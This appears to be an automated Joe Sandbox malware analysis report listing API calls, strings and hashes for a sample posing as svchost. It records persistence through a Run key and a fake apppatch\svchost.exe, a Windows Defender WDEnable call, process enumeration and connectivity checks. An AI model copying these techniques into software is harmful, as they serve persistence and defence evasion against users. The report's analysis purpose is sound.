CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039
Module32First.KERNEL32(00000000,?), ref: 0040205A
StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
Module32Next.KERNEL32(00000000,00000224), ref: 00402096

Strings

.dll, xrefs: 00402082
kernel, xrefs: 00402070

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
String ID: .dll$kernel
API String ID: 1233480013-2375045364
Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669

Function 02D452D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D452F6
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45307
GetLastError.KERNEL32 ref: 02D45310
SwitchToThread.KERNEL32 ref: 02D4531F
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45328
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D45348
CloseHandle.KERNEL32(00000000), ref: 02D45359
Module32First.KERNEL32(00000000,?), ref: 02D4537A
StrStrIA.SHLWAPI(?,kernel), ref: 02D4539C
StrStrIA.SHLWAPI(00000000,.dll), ref: 02D453A8
Module32Next.KERNEL32(00000000,00000224), ref: 02D453B6

Strings

.dll, xrefs: 02D453A2
kernel, xrefs: 02D45390

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: e1335d24abad6c7ed869de408a0381fa1276d590ea4d3de9ffcec7f2d8d0f696
Instruction ID: 3b6bad80c533e0beb586039b8d6e7d2683d72f2268798658887c27d7ef19dfb0
Opcode Fuzzy Hash: e1335d24abad6c7ed869de408a0381fa1276d590ea4d3de9ffcec7f2d8d0f696
Instruction Fuzzy Hash: C421D872D01214ABD710ABA9BC4CBAE77A8EB49328FD40295E985D3380EF74DD55CB70

Function 02D44450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444D8
GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
CloseHandle.KERNEL32(00000000), ref: 02D4453F

Strings

*SYSTEM*, xrefs: 02D444AD
ADVA, xrefs: 02D444DE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
String ID: *SYSTEM*$ADVA
API String ID: 4044281766-3691563785
Opcode ID: f927dba83340a9d06c3b651012c03e66279bddb45fb3a64ff12847bf5b8b9f35
Instruction ID: 4c32a6fc499dd7f0edb9a6324abe034e22e4045a0c5dab0149cafbeba81f505a
Opcode Fuzzy Hash: f927dba83340a9d06c3b651012c03e66279bddb45fb3a64ff12847bf5b8b9f35
Instruction Fuzzy Hash: EA318671D042486FDF10CBA4D84CBAE7BB8BF44315F844498E64667381DBB49D85CB60

Function 00402660 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
SysAllocString.OLEAUT32(?), ref: 004026C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
SysFreeString.OLEAUT32(00000000), ref: 00402844
CoUninitialize.OLE32 ref: 0040289E

Strings

Windows Explorer, xrefs: 004026CD

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54

Function 02D44C00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D44C33
GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D44C42
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D44C49
memset.MSVCRT ref: 02D44C61
GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C78
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D44C7E

Part of subcall function 02D33D90: GetProcessHeap.KERNEL32(00000008,02D44CA7,00000000,75A934D0,?,?,02D44C94,00000104,?,?,?,?,00000000), ref: 02D33DAE
Part of subcall function 02D33D90: HeapAlloc.KERNEL32(00000000,?,?,02D44C94,00000104,?,?,?,?,00000000), ref: 02D33DB5
Part of subcall function 02D33D90: memset.MSVCRT ref: 02D33DC5

GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C9F
StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D44CC6
lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D44CDA

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02D44C10

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 2345603349-374730529
Opcode ID: 3dbc60956455f08f1de06cd064ee13f0b58d0b5809f4995016b5ff08cee6a576
Instruction ID: e1601822aaff670370b604e3416fd79108b99e60611507528a332f09beaa6ce5
Opcode Fuzzy Hash: 3dbc60956455f08f1de06cd064ee13f0b58d0b5809f4995016b5ff08cee6a576
Instruction Fuzzy Hash: E421F775900105ABD711DA649D48FBBB7A9AB84701F280459E545A7340EF759FC1CBB0

Function 004020C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004020FE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
SetCurrentDirectoryA.KERNEL32(?), ref: 00402137
LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402146
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
FreeLibrary.KERNEL32(00000000), ref: 0040218C

Strings

WDEnable, xrefs: 00402155
Windows Defender, xrefs: 0040211E
MpClient.dll, xrefs: 00402141

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$WDEnable$Windows Defender
API String ID: 1010965793-3061216624
Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8

Function 02D34A16 Relevance: 16.6, APIs: 11, Instructions: 77memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D34A6F
HeapValidate.KERNEL32(00000000), ref: 02D34A72
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34A7F
HeapFree.KERNEL32(00000000), ref: 02D34A82
GetProcessHeap.KERNEL32(00000000,?), ref: 02D34A9A
HeapValidate.KERNEL32(00000000), ref: 02D34A9D
GetProcessHeap.KERNEL32(00000000,?), ref: 02D34AAA
HeapFree.KERNEL32(00000000), ref: 02D34AAD
InternetCloseHandle.WININET(00000000), ref: 02D34AC3
InternetCloseHandle.WININET(?), ref: 02D34ACD
InternetCloseHandle.WININET(00000000), ref: 02D34AD7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$CloseHandleInternet$FreeValidate
String ID:
API String ID: 278890334-0
Opcode ID: 1aabe74d3e9c6b3f8e3ce471273aec29542a98a09fb6df0ecf1d2663cc7e9706
Instruction ID: 025b93f59c3564c05b4a94dbd74bf3d8a7f647d605d2ea881d8cb84784af5440
Opcode Fuzzy Hash: 1aabe74d3e9c6b3f8e3ce471273aec29542a98a09fb6df0ecf1d2663cc7e9706
Instruction Fuzzy Hash: F921C031A09268AADB259BB5EC4CF9F7BACEF45319F040868F549D7240CA74DC90DBB0

Function 02D26750 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D26772
memset.MSVCRT ref: 02D26790
lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,74DF0F10), ref: 02D267A9
RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,74DF0F10), ref: 02D2681D
RegSetValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,74DF0F10), ref: 02D26843
RegDeleteValueA.KERNEL32(?,A1633BD9a,?,?,?,?,?,74DF0F10), ref: 02D26854
RegCloseKey.ADVAPI32(?,?,?,?,?,74DF0F10), ref: 02D26863

Strings

A1633BD9a, xrefs: 02D2683D, 02D2684E
software\microsoft, xrefs: 02D26817

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$CloseDeleteOpenlstrcpyn
String ID: A1633BD9a$software\microsoft
API String ID: 2098141307-1581879137
Opcode ID: 3f7bfdb3c1343e1ca1b351d7ac6e2081e320d966271cc0244e506edbb326bf06
Instruction ID: 2468eec380ea5b66979ecb55a7b46df3d309d8a3d501c09ff71b4c9e8c20d7d1
Opcode Fuzzy Hash: 3f7bfdb3c1343e1ca1b351d7ac6e2081e320d966271cc0244e506edbb326bf06
Instruction Fuzzy Hash: 3F31EAB1944318ABEB14DB64DCCDFED77ACEB14308F5044A9E545D3241D674DEC88BA0

Function 02D332C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D332C8
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02D368E7), ref: 02D332FF
RegQueryValueExA.ADVAPI32(?,A1633F95a,00000000,02D368E7,00000000,?,?,02D368E7), ref: 02D3331C
RegCloseKey.ADVAPI32(?,?,02D368E7), ref: 02D33326
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02D368E7), ref: 02D33359
RegQueryValueExA.KERNEL32(?,A1633F95a,00000000,?,00000000,02D368E7,?,02D368E7), ref: 02D33376
RegCloseKey.ADVAPI32(?,?,02D368E7), ref: 02D33380

Strings

A1633F95a, xrefs: 02D33316, 02D33370
software\microsoft, xrefs: 02D332E8, 02D33342

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: A1633F95a$software\microsoft
API String ID: 2113243795-1894910394
Opcode ID: f31e9773d253f055a3a547c0d7decd4ef92fb781adc2bd59d274c65532b44580
Instruction ID: b0a2cde69ce10ff15793f0a71b9e0bb70e9a3dd7e3fb1e25ddb9c8dc581e9e2a
Opcode Fuzzy Hash: f31e9773d253f055a3a547c0d7decd4ef92fb781adc2bd59d274c65532b44580
Instruction Fuzzy Hash: 2C212175E40209FBEB00DBA4DD59FEEBBB8EF48704F504559E501E6240EBB4AA44CB94

Function 02D455C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D455EF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D45628
_snprintf.MSVCRT ref: 02D45693
_snprintf.MSVCRT ref: 02D456F6

Strings

1234567890QWERTYUIOPASDFGHJKLZXCVBNM, xrefs: 02D455D1
5E8DC0EB, xrefs: 02D456C3, 02D456F5
A1633F41a, xrefs: 02D45661, 02D45692

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: _snprintf$DirectoryInformationSystemVolumeWindows
String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$5E8DC0EB$A1633F41a
API String ID: 2823094833-349683712
Opcode ID: bdfeadda5906fa9629a1d421fe7510be42d85b9e62f65ac7e6f3e0b0b088a2c3
Instruction ID: 02e11e0e7737fa079a95fe3ee47d84ea8461817a78106cd6e3f2aae0702b80d6
Opcode Fuzzy Hash: bdfeadda5906fa9629a1d421fe7510be42d85b9e62f65ac7e6f3e0b0b088a2c3
Instruction Fuzzy Hash: 88413B71A00149EFD714CF68AD88BEEF7AAEFA4304F9541A4D548AB380DBB16E45C790

Function 02D23548 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53registryCOMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
RegCloseKey.KERNEL32(00000000), ref: 02D235F5

Strings

C:\Windows\apppatch\svchost.exe, xrefs: 02D2358E, 02D23593, 02D235A8, 02D235D5
userinit, xrefs: 02D235E0
software\microsoft\windows\currentversion\run, xrefs: 02D235C2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseExistsFileOpenPathQueryValue
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
API String ID: 3861587275-2273877672
Opcode ID: 2a7dd7176932ba39b2a9f64f9deaec00ad7d82407ddfbc21c353d7877b648804
Instruction ID: 1488ffb6cf180b6620d6f7a66d17583f21f443616e31b195aa9bbf500830ef8b
Opcode Fuzzy Hash: 2a7dd7176932ba39b2a9f64f9deaec00ad7d82407ddfbc21c353d7877b648804
Instruction Fuzzy Hash: F9014E30B4434CABFB14C670ED47FED3329EF54B08F5005A8E54AA2700E6B49E888B70

Function 02D23564 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
RegCloseKey.KERNEL32(00000000), ref: 02D235F5

Strings

C:\Windows\apppatch\svchost.exe, xrefs: 02D2358E, 02D23593, 02D235A8, 02D235D5
userinit, xrefs: 02D235E0
software\microsoft\windows\currentversion\run, xrefs: 02D235C2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseExistsFileOpenPathQueryValue
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
API String ID: 3861587275-2273877672
Opcode ID: 64f63e565d3ffb8775fb3fb632827d3123f85ff826fd5a13844e0acf224caa24
Instruction ID: 429301189f843e50cd8d4fb95747ef8a46b28bccc228008a88118839e3e1e7ad
Opcode Fuzzy Hash: 64f63e565d3ffb8775fb3fb632827d3123f85ff826fd5a13844e0acf224caa24
Instruction Fuzzy Hash: 7201D831A4424CABFB14C660EC5AFED7368DB54B18F5004A8E546A2240E6B49E888B70

Function 02D27140 Relevance: 12.1, APIs: 8, Instructions: 88fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,74DEF380,?,?,?,02D34A6C,00000000,00000000,00000000), ref: 02D27179
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D2718E
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D2719D
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D271AF
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D271BF
SetEndOfFile.KERNEL32(00000000,?,?,02D34A6C,00000000), ref: 02D271CC
GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D34A6C,00000000), ref: 02D271EE
CloseHandle.KERNEL32(00000000,?,?,02D34A6C,00000000), ref: 02D271FF

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
String ID:
API String ID: 1080409958-0
Opcode ID: d09e697f76221a8282c38f5dd9fc8f296cfda2a3510c52f46c8cb5392defcb3c
Instruction ID: 54ecc2ad4e37cb934b971a47088824aaedbe8e997c52375c2b478835e015c6cd
Opcode Fuzzy Hash: d09e697f76221a8282c38f5dd9fc8f296cfda2a3510c52f46c8cb5392defcb3c
Instruction Fuzzy Hash: 4421B031A402247BE7314A26EC4CFABBB6CEFD5758F60C515F9049A380D7718D55C6B0

Function 02D26BC0 Relevance: 10.6, APIs: 7, Instructions: 101sleepthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D26BE1

Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5

Sleep.KERNEL32(000001F4,76EEC3F0,00000000,74DF0F10), ref: 02D26BFD
IsUserAnAdmin.SHELL32 ref: 02D26C25
CreateThread.KERNEL32(00000000,00000000,02D26870,00000000,00000000,00000000), ref: 02D26C6E
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D26C9A
GetHandleInformation.KERNEL32(?,00000000), ref: 02D26CC7
CloseHandle.KERNEL32(?), ref: 02D26CD8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$AdminCheckConnectionHandleInternetUserlstrcpyn$AliveCacheCloseCreateFlushInformationMultipleNetworkObjectsResolverSleepThreadWait
String ID:
API String ID: 202280876-0
Opcode ID: 9b9b0073f06d9fd97f118b7b3843417a501887469063990c297ed42262a30f22
Instruction ID: 6f9cc10816588a853b986b4eae9a3567ed1de2277a4366da6d41f1c69d2ee387
Opcode Fuzzy Hash: 9b9b0073f06d9fd97f118b7b3843417a501887469063990c297ed42262a30f22
Instruction Fuzzy Hash: 0F313CB194033467D721BF60AC84BAD7BADDB5471CF101564EA05923C0DB74CD99D6F1

Function 00402340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
CloseHandle.KERNEL32(00000000), ref: 0040241D

Strings

\\.\pipe\acsipc_server, xrefs: 00402365

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 00401AA0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401AC4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
Process32First.KERNEL32 ref: 00401AF5
StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
Process32Next.KERNEL32(00000000,?), ref: 00401B1C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 3068433855-0
Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
